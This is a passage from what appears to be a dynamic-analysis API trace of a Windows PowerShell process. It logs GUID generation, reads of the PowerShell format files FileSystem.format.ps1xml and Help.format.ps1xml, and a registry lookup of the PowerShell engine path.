	[0747.911] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x509496db, Data2=0x853a, Data3=0x44ae, Data4=([0]=0xa7, [1]=0x61, [2]=0x14, [3]=0xf8, [4]=0xdb, [5]=0xb1, [6]=0xa, [7]=0x57))) returned 0x0
	[0747.912] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xa2463b1a, Data2=0xc1a7, Data3=0x44a1, Data4=([0]=0xb5, [1]=0x9f, [2]=0x6f, [3]=0x7b, [4]=0xff, [5]=0xb0, [6]=0xde, [7]=0x1f))) returned 0x0
	[0747.912] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x2e95f16f, Data2=0xfbed, Data3=0x4ebb, Data4=([0]=0xab, [1]=0x5f, [2]=0x16, [3]=0x5, [4]=0x26, [5]=0xfd, [6]=0xe, [7]=0x55))) returned 0x0
	[0747.912] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x4544ff0c, Data2=0xccea, Data3=0x4b0b, Data4=([0]=0x90, [1]=0x48, [2]=0xc1, [3]=0xa1, [4]=0x50, [5]=0x61, [6]=0x7a, [7]=0xf9))) returned 0x0
	[0747.912] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x1b625f58, Data2=0x597c, Data3=0x4f26, Data4=([0]=0x91, [1]=0x62, [2]=0xd0, [3]=0x8d, [4]=0xe6, [5]=0x96, [6]=0x8a, [7]=0x91))) returned 0x0
	[0747.913] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xf655643e, Data2=0x2de8, Data3=0x4bd6, Data4=([0]=0xb3, [1]=0x46, [2]=0xb9, [3]=0xcb, [4]=0xda, [5]=0x85, [6]=0x38, [7]=0xec))) returned 0x0
	[0747.913] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xaf699a3, Data2=0x5901, Data3=0x4a97, Data4=([0]=0x99, [1]=0xd5, [2]=0xa0, [3]=0xb, [4]=0xdc, [5]=0x2d, [6]=0x51, [7]=0x91))) returned 0x0
	[0747.913] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xdf5d6f1e, Data2=0xe57c, Data3=0x4027, Data4=([0]=0x86, [1]=0x31, [2]=0xaa, [3]=0x68, [4]=0x2a, [5]=0x72, [6]=0x38, [7]=0xf))) returned 0x0
	[0747.913] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x47a9debe, Data2=0x2675, Data3=0x4a9f, Data4=([0]=0x86, [1]=0x2b, [2]=0x3, [3]=0x2e, [4]=0xeb, [5]=0x17, [6]=0xde, [7]=0x40))) returned 0x0
	[0747.913] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x9bbf3239, Data2=0xf636, Data3=0x4c62, Data4=([0]=0x8d, [1]=0xbc, [2]=0xd8, [3]=0x16, [4]=0xe8, [5]=0x98, [6]=0x98, [7]=0x6f))) returned 0x0
	[0747.913] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x6cf81263, Data2=0x4ac4, Data3=0x467c, Data4=([0]=0x8b, [1]=0x38, [2]=0x47, [3]=0xf1, [4]=0xcc, [5]=0x4c, [6]=0xf7, [7]=0xbe))) returned 0x0
	[0747.914] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xdca3734a, Data2=0xc462, Data3=0x4175, Data4=([0]=0x86, [1]=0x3, [2]=0xd0, [3]=0x3b, [4]=0x3d, [5]=0xe2, [6]=0xd2, [7]=0x7b))) returned 0x0
	[0747.914] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xdfcbfbf3, Data2=0xb8b8, Data3=0x45d4, Data4=([0]=0xa9, [1]=0x38, [2]=0xd, [3]=0x7c, [4]=0x84, [5]=0x85, [6]=0x98, [7]=0x8))) returned 0x0
	[0747.914] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xd863f23, Data2=0x1c9a, Data3=0x4db8, Data4=([0]=0x94, [1]=0x85, [2]=0x15, [3]=0x1b, [4]=0x9f, [5]=0x31, [6]=0x32, [7]=0xb9))) returned 0x0
	[0747.914] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x97e1c044, Data2=0x6f60, Data3=0x4e19, Data4=([0]=0x9b, [1]=0x73, [2]=0xc1, [3]=0xb6, [4]=0xda, [5]=0xcc, [6]=0x69, [7]=0x3f))) returned 0x0
	[0747.914] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xbc5778c7, Data2=0xe084, Data3=0x4188, Data4=([0]=0xa2, [1]=0x96, [2]=0x5b, [3]=0x81, [4]=0xab, [5]=0x72, [6]=0xe4, [7]=0x62))) returned 0x0
	[0747.915] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x54026750, Data2=0xc4c6, Data3=0x4bc2, Data4=([0]=0xa1, [1]=0x3e, [2]=0xd0, [3]=0x0, [4]=0xa8, [5]=0x91, [6]=0xfc, [7]=0x1))) returned 0x0
	[0747.915] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xd42a39f4, Data2=0x3850, Data3=0x4373, Data4=([0]=0xba, [1]=0x8d, [2]=0x25, [3]=0x18, [4]=0x4a, [5]=0x8d, [6]=0xc, [7]=0xb0))) returned 0x0
	[0747.915] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xad883086, Data2=0x351d, Data3=0x47b0, Data4=([0]=0xaf, [1]=0xf1, [2]=0x55, [3]=0x14, [4]=0x83, [5]=0x23, [6]=0x1e, [7]=0xf2))) returned 0x0
	[0747.915] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x327a2547, Data2=0x3d00, Data3=0x4035, Data4=([0]=0xb5, [1]=0xd9, [2]=0x7b, [3]=0xcd, [4]=0xf8, [5]=0x36, [6]=0x96, [7]=0xe3))) returned 0x0
	[0747.915] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x305430cd, Data2=0xa5a5, Data3=0x4b24, Data4=([0]=0x80, [1]=0xd2, [2]=0xf7, [3]=0x21, [4]=0xd8, [5]=0xd5, [6]=0xee, [7]=0x7e))) returned 0x0
	[0747.915] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x833a4a6e, Data2=0xdb3d, Data3=0x42f1, Data4=([0]=0xa6, [1]=0xc8, [2]=0xff, [3]=0xc7, [4]=0xda, [5]=0xcd, [6]=0xb8, [7]=0xa9))) returned 0x0
	[0747.916] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xba1d2467, Data2=0xe452, Data3=0x426c, Data4=([0]=0x93, [1]=0xb2, [2]=0x58, [3]=0xae, [4]=0xa6, [5]=0x19, [6]=0x90, [7]=0xf4))) returned 0x0
	[0747.916] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x2fa64928, Data2=0x9a69, Data3=0x4865, Data4=([0]=0x97, [1]=0x1, [2]=0xdb, [3]=0x81, [4]=0xaf, [5]=0x7b, [6]=0x7c, [7]=0x47))) returned 0x0
	[0747.916] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xe8ac4e65, Data2=0x8bab, Data3=0x4b85, Data4=([0]=0x98, [1]=0x99, [2]=0xfb, [3]=0x57, [4]=0x70, [5]=0x84, [6]=0xea, [7]=0xd))) returned 0x0
	[0747.919] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x3517b894, Data2=0x5048, Data3=0x474d, Data4=([0]=0xba, [1]=0x8e, [2]=0xcf, [3]=0x3e, [4]=0x73, [5]=0xe7, [6]=0x16, [7]=0x55))) returned 0x0
	[0747.919] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0747.919] GetFileType (hFile=0x30c) returned 0x1
	[0747.919] SetErrorMode (uMode=0x1) returned 0x1
	[0747.920] GetFileType (hFile=0x30c) returned 0x1
	[0747.920] ReadFile (in: hFile=0x30c, lpBuffer=0x34a0750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x34a0750*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0747.921] ReadFile (in: hFile=0x30c, lpBuffer=0x34a0750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x34a0750*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0747.922] ReadFile (in: hFile=0x30c, lpBuffer=0x34a0750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x34a0750*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0747.922] ReadFile (in: hFile=0x30c, lpBuffer=0x34a0750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x34a0750*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0747.924] ReadFile (in: hFile=0x30c, lpBuffer=0x34a0750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x34a0750*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0747.924] ReadFile (in: hFile=0x30c, lpBuffer=0x34a0750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x34a0750*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0747.924] ReadFile (in: hFile=0x30c, lpBuffer=0x34a0750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x34a0750*, lpNumberOfBytesRead=0x18d178*=0x119, lpOverlapped=0x0) returned 1
	[0747.924] ReadFile (in: hFile=0x30c, lpBuffer=0x34a0750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x34a0750*, lpNumberOfBytesRead=0x18d178*=0x0, lpOverlapped=0x0) returned 1
	[0747.925] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d208 | out: phkResult=0x18d208*=0x30c) returned 0x0
	[0747.925] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d18c, lpData=0x0, lpcbData=0x18d188*=0x0 | out: lpType=0x18d18c*=0x1, lpData=0x0, lpcbData=0x18d188*=0x56) returned 0x0
	[0747.925] CoTaskMemAlloc (cb=0x5a) returned 0x1b941920
	[0747.925] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d15c, lpData=0x1b941920, lpcbData=0x18d158*=0x56 | out: lpType=0x18d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d158*=0x56) returned 0x0
	[0747.925] CoTaskMemFree (pv=0x1b941920) 
	[0747.925] RegCloseKey (hKey=0x30c) returned 0x0
	[0747.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0747.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0749.331] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x976d94de, Data2=0x4dd6, Data3=0x4d4e, Data4=([0]=0xb2, [1]=0xd7, [2]=0x4d, [3]=0x32, [4]=0xe8, [5]=0x23, [6]=0xde, [7]=0x73))) returned 0x0
	[0749.332] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xf5d892bd, Data2=0xc7a7, Data3=0x4834, Data4=([0]=0x95, [1]=0x90, [2]=0xc5, [3]=0xaf, [4]=0x68, [5]=0x83, [6]=0x4c, [7]=0x48))) returned 0x0
	[0749.332] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x24a46125, Data2=0x525e, Data3=0x4f98, Data4=([0]=0xaf, [1]=0xa, [2]=0x3c, [3]=0xb7, [4]=0xcf, [5]=0x1f, [6]=0x9c, [7]=0x8d))) returned 0x0
	[0749.332] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x6221519, Data2=0x53ed, Data3=0x43be, Data4=([0]=0x99, [1]=0xc3, [2]=0x42, [3]=0xd4, [4]=0x1b, [5]=0xba, [6]=0x6, [7]=0x42))) returned 0x0
	[0749.336] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0749.336] GetFileType (hFile=0x30c) returned 0x1
	[0749.336] SetErrorMode (uMode=0x1) returned 0x1
	[0749.336] GetFileType (hFile=0x30c) returned 0x1
	[0749.336] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.337] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.337] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.337] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.338] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.338] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.338] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.338] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.340] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.340] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.340] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.341] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.341] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.341] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.342] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.342] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.345] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.345] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.345] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.346] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.346] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.346] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.347] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.347] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.347] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.348] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.348] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.348] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.349] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.373] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.373] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.374] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.378] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.378] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.379] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.379] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.379] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.380] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.380] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.389] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.389] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.389] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.390] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.390] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.390] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.391] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.391] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.391] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.391] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.392] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.392] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.392] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.393] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
